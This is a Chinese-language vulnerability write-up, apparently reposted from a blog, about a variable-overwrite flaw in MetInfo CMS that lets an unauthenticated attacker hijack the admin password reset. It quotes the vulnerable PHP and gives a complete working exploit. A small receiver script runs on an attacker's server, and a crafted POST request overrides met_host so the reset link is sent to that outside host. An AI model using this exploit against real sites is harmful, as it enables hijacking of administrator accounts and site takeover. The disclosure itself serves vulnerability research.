MetInfo 管理员密码重置

1. 发布时间：2016-08-25
2. 公开时间：N/A
3. 漏洞类型：变量覆盖
4. 危害等级：高
5. 漏洞编号：xianzhi-2016-08-41454550
6. 测试版本：N/A

---

漏洞详情

config/config.inc.php

$query = "SELECT  FROM $metconfig WHERE lang='$lang' or";
$result = $db->query($query);
while($list_config= $db->fetch_array($result)){
    $_M[config][$list_config['name']]=$list_config['value'];
    if($metinfoadminok)$list_config['value']=str_replace('"', '"', str_replace("'", ''',$list_config['value']));
    $settings_arr[]=$list_config;
    if($list_config['columnid']){
        $settings[$list_config['name'].''.$listconfig['columnid']]=$list_config['value'];
    }else{
        $settings[$list_config['name']]=$list_config['value'];
    }
    if($list_config['flashid']){
        $list_config['value']=explode('|',$list_config['value']);
        $falshval['type']=$list_config['value'][0];
        $falshval['x']=$list_config['value'][1];
        $falshval['y']=$list_config['value'][2];
        $falshval['imgtype']=$list_config['value'][3];
        $list_config['mobile_value']=explode('|',$list_config['mobile_value']);
        $falshval['wap_type']=$list_config['mobile_value'][0];
        $falshval['wap_y']=$list_config['mobile_value'][1];
        $met_flasharray[$list_config['flashid']]=$falshval;
    }
}
$_M[lang]=$lang;
@extract($settings)

从数据库中取出系统配置信息，然后用extract()函数初始化各个变量 admin/include/common.inc.php

require_once ROOTPATH.'config/config.inc.php';
………………
isset($_REQUEST['GLOBALS']) && exit('Access Error');
unset($_POST['met_webkeys']);
unset($_GET['met_webkeys']);
unset($_POST['metinfo_admin_name']);
unset($_GET['metinfo_admin_name']);
unset($_GET['met_cookie']);
unset($_COOKIE['met_cookie']);
unset($_POST['met_cookie']);
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != '' && $$_key = daddslashes($_value,0,0,1);
        $_M['form'][$_key]=daddslashes($_value,0,0,1);
    }
}

先引用了config.inc.php 然后做了一次伪全局的注册 等于所有被config.inc.php初始化的配置都可以被任意覆盖了 800多个配置项 哪个进了sql 哪个进了关键逻辑 哪个进了命令执行 都不好说 实在是太多了没有一个一个变量跟进去看逻辑 找了个后台不用登录就能访问的文件 admin/admin/getpassword.php 行144

$sendMail=jmailsend($from,$fromname,$to,$title,$body,$usename,$usepassword,$smtp);
if($sendMail==0){
   require_once ROOTPATH.'include/export.func.php';
   $post=array('to'=>$to,'title'=>$title,'body'=>$body);
   $met_file='/passwordmail.php';
   $sendMail=curl_post($post,30);
   if($sendMail=='nohost')$sendMail=0;    
}

当jmailsend失败的时候 就会使用curl_post函数来发送 include/export.func.php

function curl_post($post,$timeout){
global $met_weburl,$met_host,$met_file;
$host=$met_host;
$file=$met_file;
    if(get_extension_funcs('curl')&&function_exists('curl_init')&&function_exists('curl_setopt')&&function_exists('curl_exec')&&function_exists('curl_close')){
        $curlHandle=curl_init(); 
        curl_setopt($curlHandle,CURLOPT_URL,'http://'.$host.$file); 
        curl_setopt($curlHandle,CURLOPT_REFERER,$met_weburl);
        curl_setopt($curlHandle,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($curlHandle,CURLOPT_CONNECTTIMEOUT,$timeout);
        curl_setopt($curlHandle,CURLOPT_TIMEOUT,$timeout);
        curl_setopt($curlHandle,CURLOPT_POST, 1);    
        curl_setopt($curlHandle,CURLOPT_POSTFIELDS, $post);
        $result=curl_exec($curlHandle); 
        curl_close($curlHandle); 
    }

$met_host其实是metinfo的api接口地址 保存在数据库met_config表中 所以 只要修改met_host为可控的地址 就能直接拦下修改密码的验证邮件 证明如下 先写个收信脚本passwordmail.php 丢到自己服务器上web根目录

<?php
file_put_contents('x.txt',$_POST['body']);

然后 发包

Host: www.xxxxx.net.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: recordurl=%2Chttp%253A%252F%252Fwww.xxxxx.net.cn%252F
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

action=next2&abt_type=2&admin_mobile=admin&submit=1&met_host=123.456.789.000

met_host=改成自己的服务器地址 查看自己服务器web跟目录下的x.txt就能找到重置密码的链接 作者：索马里的乌贼 链接：https://www.jianshu.com/p/03e7bccc2bad